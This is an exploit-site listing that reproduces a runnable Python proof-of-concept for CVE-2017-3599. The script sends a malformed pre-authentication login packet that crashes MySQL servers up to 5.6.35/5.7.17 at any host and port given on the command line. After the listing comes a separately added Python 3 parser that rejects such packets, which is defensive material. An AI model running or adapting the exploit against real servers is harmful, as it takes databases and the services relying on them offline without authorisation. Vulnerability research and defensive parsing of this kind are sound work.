MySQL 5.6.35 / 5.7.17 Integer Overflow Exploit

Date: 02 May 2017
Reported by: Rodrigo Marcos
Type: zdt
Source: 0day.today
Views: 179

MySQL 5.6.35 / 5.7.17 Integer Overflow Exploit, Remote Denial of Service (DOS) Attack

Code
'''
# Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
# Exploit Title: Remote MySQL DOS (Integer Overflow)
# Google Dork: N/A
# Date: 13th April 2017
# Exploit Author: Rodrigo Marcos
# Vendor Homepage: https://www.mysql.com/
# Software Link: https://www.mysql.com/downloads/
# Version: 5.6.35 and below / 5.7.17 and below
# Tested on: N/A
# CVE : CVE-2017-3599
'''
 
import socket 
import sys
from struct import pack
 
'''
CVE-2017-3599 Proof of Concept exploit code.
 
https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/
 
Rodrigo Marcos
 
'''
 
if len(sys.argv)<2:
 
    print "Usage: python " + sys.argv[0] + " host [port]"
    exit(0)
 
else:
    HOST = sys.argv[1]
 
    if len(sys.argv)>2:
        PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
    else:
        PORT = 3306
 
print "[+] Creating packet..."
 
'''
3 bytes     Packet length (little-endian)
1 byte      Packet number
 
Login request:
 
Packet format (when the server is 4.1 or newer):
 
Bytes       Content
-----       ----
4           client capabilities
4           max packet size
1           charset number
23          reserved (always 0)
n           user name, \0-terminated
n           plugin auth data (e.g. scramble), length encoded
n           database name, \0-terminated
            (if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n           client auth plugin name - \0-terminated string,
            (if CLIENT_PLUGIN_AUTH is set in the capabilities)
 
'''
 
# packet_len = '\x64\x00\x00'
 
packet_num = '\x01'
 
#Login request packet
packet_cap = '\x85\xa2\xbf\x01'     # client capabilities (default)
packet_max = '\x00\x00\x00\x01'     # max packet size (default)
packet_cset = '\x21'                # charset (default)
p_reserved = '\x00' * 23            # 23 bytes reserved with nulls (default)
packet_usr =  'test\x00'            # username null terminated (default)
 
packet_auth  = '\xff'           # both \xff and \xfe crash the server
                                # (as a length-encoded integer prefix, 0xfe announces
                                #  an 8-byte length; 0xff is not a valid prefix at all)
 
'''
Conditions to crash:
 
1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 bytes
 
The expected value is the password, which could be of two different formats
(null terminated or length encoded) depending on the client capability flags.
'''
 
packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth 
packet_len = pack('<i', len(packet))[:3]   # 3-byte little-endian length, as MySQL expects
 
request = packet_len + packet_num + packet
 
print "[+] Connecting to host..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((HOST, PORT))
    print "[+] Connected."
 
except socket.error as e:
    print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + ": " + str(e)
    s.close()
    print "[+] Exiting."
    sys.exit(1)
 
print "[+] Receiving greeting from remote host..."
data = s.recv(1024)
print "[+] Done."
 
print "[+] Sending our payload..."
s.send(request)
print "[+] Done."
#print "Our data: %r" % request
 
s.close()

#  0day.today [2018-01-05]  #
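The packet layout documented in the PoC's docstring is the server's input, so the defensive counterpart is a parser that refuses to trust any length it has not verified. The following Python 3 script is an added example (not code from the PoC or from SECFORCE): it parses the 4-byte header and the 4.1+ login request, decoding the auth-data field as a length-encoded integer when the CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA capability bit is set and as a NUL-terminated string otherwise, and it rejects a packet whose length prefix announces more bytes than remain or uses a prefix byte that can never start a length. The capability constants are the MySQL protocol values; the sample packets are constructed here to match the PoC's fixed fields, and the older one-byte-length form (CLIENT_SECURE_CONNECTION without the lenenc bit) and connection attributes are deliberately not handled.

```python
"""Strict parser for the MySQL 4.1+ client login packet laid out above (added
example, not part of the PoC): every length field is checked against the bytes
actually present before anything is read."""
import struct

# Client capability bits (MySQL protocol constants) that change the layout.
CLIENT_CONNECT_WITH_DB = 0x00000008
CLIENT_PLUGIN_AUTH = 0x00080000
CLIENT_CONNECT_ATTRS = 0x00100000
CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA = 0x00200000


def read_lenenc_int(buf, pos):
    """Decode a length-encoded integer at buf[pos]; return (value, next_pos).
    A value below 0xfb is one byte; 0xfc/0xfd/0xfe announce 2/3/8 more bytes;
    0xfb and 0xff never start a length. Raises ValueError instead of reading
    past the end of the buffer."""
    if pos >= len(buf):
        raise ValueError("length prefix missing at offset %d" % pos)
    first = buf[pos]
    if first < 0xfb:
        return first, pos + 1
    if first in (0xfb, 0xff):
        raise ValueError("0x%02x is not a valid length-encoded prefix" % first)
    width = {0xfc: 2, 0xfd: 3, 0xfe: 8}[first]
    remaining = len(buf) - (pos + 1)
    if remaining < width:
        raise ValueError("prefix 0x%02x needs %d bytes, only %d remain"
                         % (first, width, remaining))
    return int.from_bytes(buf[pos + 1:pos + 1 + width], "little"), pos + 1 + width


def read_cstring(buf, pos):
    """Read a NUL-terminated string; return (bytes, next_pos)."""
    end = buf.find(b"\x00", pos)
    if end < 0:
        raise ValueError("unterminated string at offset %d" % pos)
    return buf[pos:end], end + 1


def parse_login_packet(raw):
    """Parse 4-byte header + login request. Returns {"ok": True, ...fields} or
    {"ok": False, "reason": ...}. Auth data is taken as length-encoded when the
    lenenc capability bit is set and NUL-terminated otherwise (the two formats
    the PoC comments mention); connection attributes are left unparsed."""
    try:
        if len(raw) < 4:
            raise ValueError("packet shorter than its 4-byte header")
        length, payload = int.from_bytes(raw[0:3], "little"), raw[4:]
        if len(payload) != length:
            raise ValueError("header says %d payload bytes, got %d" % (length, len(payload)))
        if len(payload) < 32:
            raise ValueError("fixed part of the login request is 32 bytes")
        caps, max_packet, charset = struct.unpack_from("<IIB", payload, 0)
        if payload[9:32] != b"\x00" * 23:
            raise ValueError("reserved bytes must be zero")
        user, pos = read_cstring(payload, 32)
        if caps & CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA:
            n, pos = read_lenenc_int(payload, pos)
            if len(payload) - pos < n:
                raise ValueError("auth data declares %d bytes, only %d remain" % (n, len(payload) - pos))
            auth, pos = payload[pos:pos + n], pos + n
        else:
            auth, pos = read_cstring(payload, pos)
        db = plugin = None
        if caps & CLIENT_CONNECT_WITH_DB:
            db, pos = read_cstring(payload, pos)
        if caps & CLIENT_PLUGIN_AUTH and pos < len(payload):
            plugin, pos = read_cstring(payload, pos)
        if pos != len(payload) and not caps & CLIENT_CONNECT_ATTRS:
            raise ValueError("%d unexpected trailing bytes" % (len(payload) - pos))
        return {"ok": True, "seq": raw[3], "caps": caps, "max_packet": max_packet,
                "charset": charset, "user": user.decode("utf-8", "replace"),
                "auth": auth, "db": db, "plugin": plugin}
    except ValueError as e:
        return {"ok": False, "reason": str(e)}


def build_login_packet(user, auth, caps, plugin=b"mysql_native_password", seq=1):
    """Encode a well-formed packet (lenenc auth data under 0xfb bytes, no
    database name) with a correct 3-byte little-endian length header."""
    assert len(auth) < 0xfb and caps & CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA
    payload = struct.pack("<IIB", caps, 0x01000000, 0x21) + b"\x00" * 23
    payload += user + b"\x00" + bytes([len(auth)]) + auth
    if caps & CLIENT_PLUGIN_AUTH:
        payload += plugin + b"\x00"
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


POC_CAPS = 0x01bfa285  # the capability flags the PoC sends ('\x85\xa2\xbf\x01')
# Constructed samples with the PoC's fixed fields and user "test": one ends in
# a bare 0xff, the other in a 0xfe prefix carrying only 2 of its 8 bytes.
_FIXED = struct.pack("<IIB", POC_CAPS, 0x01000000, 0x21) + b"\x00" * 23 + b"test\x00"
POC_STYLE_PACKET = bytes([len(_FIXED) + 1, 0, 0, 1]) + _FIXED + b"\xff"
TRUNCATED_PACKET = bytes([len(_FIXED) + 3, 0, 0, 1]) + _FIXED + b"\xfe\x01\x02"
GOOD_PACKET = build_login_packet(b"test", b"\x01" * 20, POC_CAPS)

if __name__ == "__main__":
    for name, pkt in (("poc-style", POC_STYLE_PACKET), ("truncated", TRUNCATED_PACKET),
                      ("well-formed", GOOD_PACKET)):
        print(name, parse_login_packet(pkt))
```

Both malformed samples are rejected before any byte beyond the packet is touched, while the well-formed packet built with the same capability flags parses cleanly; the same "check the remaining length before honouring a prefix" rule is what a patched server or a protocol-aware IDS applies at this field.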
